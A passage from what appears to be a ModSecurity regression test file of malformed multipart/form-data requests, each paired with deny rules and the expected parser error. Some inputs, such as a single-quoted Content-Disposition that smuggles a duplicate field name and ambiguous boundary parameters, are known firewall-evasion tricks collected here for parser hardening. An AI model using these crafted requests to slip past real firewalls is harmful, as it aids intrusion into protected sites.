form-data; name=\"a\"\r\n", + "\r\n", + "--test\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "--\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Adding request argument \\(BODY\\): name \"a\", value \"--test\"" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser error (no final boundary)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Final boundary missing" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser error (no disposition)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Part missing Content-Disposition header" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser error (bad disposition)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Invalid Content-Disposition header" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser error (no disposition name)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Content-Disposition header missing name field" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser error (no disposition name)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + ":\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"nvalid part header \\(header name missing\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule MULTIPART_NAME \"@eq 1234\" \"phase:2,deny,id:500067\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (part header folding - space)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"name: a.*variable: 1.*" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", + "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", + "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (part header folding - tab)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"name: a.*variable: 1.*" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", + "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", + "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (part header folding - mixed)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + " name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"name: a.*variable: 1.*" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", + "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", + "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (part header folding - invalid)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\fname=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"name: a.*variable: 1.*" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", + "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", + "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (part header folding - mixed invalid)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data;\r\n", + "\f\tname=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"name: a.*variable: 1.*" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", + "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", + "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500076\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (data after final boundary)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646--\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"b\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"name: a.*variable: 1.*", + "http_code": 403 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_DATA_AFTER \"@eq 1\" \"phase:2,deny,status:403,id:500074\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (C-D uses single quotes)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=\"a\"\r\n", + "\r\n", + "1\r\n", + "-----------------------------69343412719991675451336310646\r\n", + "Content-Disposition: form-data; name=';filename=\"dummy';name=b;\"\r\n", + "\r\n", + "2\r\n", + "-----------------------------69343412719991675451336310646--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Duplicate Content-Disposition name", + "http_code": 200 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_INVALID_QUOTING \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (invalid C-T boundary separator - comma)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data, boundary=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Invalid boundary in C-T \\(malformed\\)", + "http_code": 403 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (invalid C-T boundary separator - space)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data boundary=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (invalid C-T boundary parameter name - case)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; bOundAry=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(case sensitivity\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (invalid C-T boundary parameter name - trailing chars)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary123=0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Invalid boundary in C-T \\(parameter name\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (multiple C-T boundaries - first quoted)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=\"0000\"; boundary=1111", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Multiple boundary parameters in C-T" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (multiple C-T boundaries - comma separated)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=0000, boundary=1111", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Multiple boundary parameters in C-T" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (boundary whitespace in C-T - after name)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary =0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (boundary whitespace in C-T - before value)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary= 0000", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "--0000\r", + "Content-Disposition: form-data; name=\"name\"\r", + "\r", + "Brian Rectanus\r", + "--0000\r", + "Content-Disposition: form-data; name=\"email\"\r", + "\r", + "brian.rectanus@breach.com\r", + "--0000\r", + "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r", + "Content-Type: image/jpeg\r", + "\r", + "BINARYDATA\r", + "--0000--\r" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log": "boundary whitespace in C-T header" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", + "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"multipart parser (boundary whitespace in C-T - after value) - apache removes the whitespace, not the case for us... TODO", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + 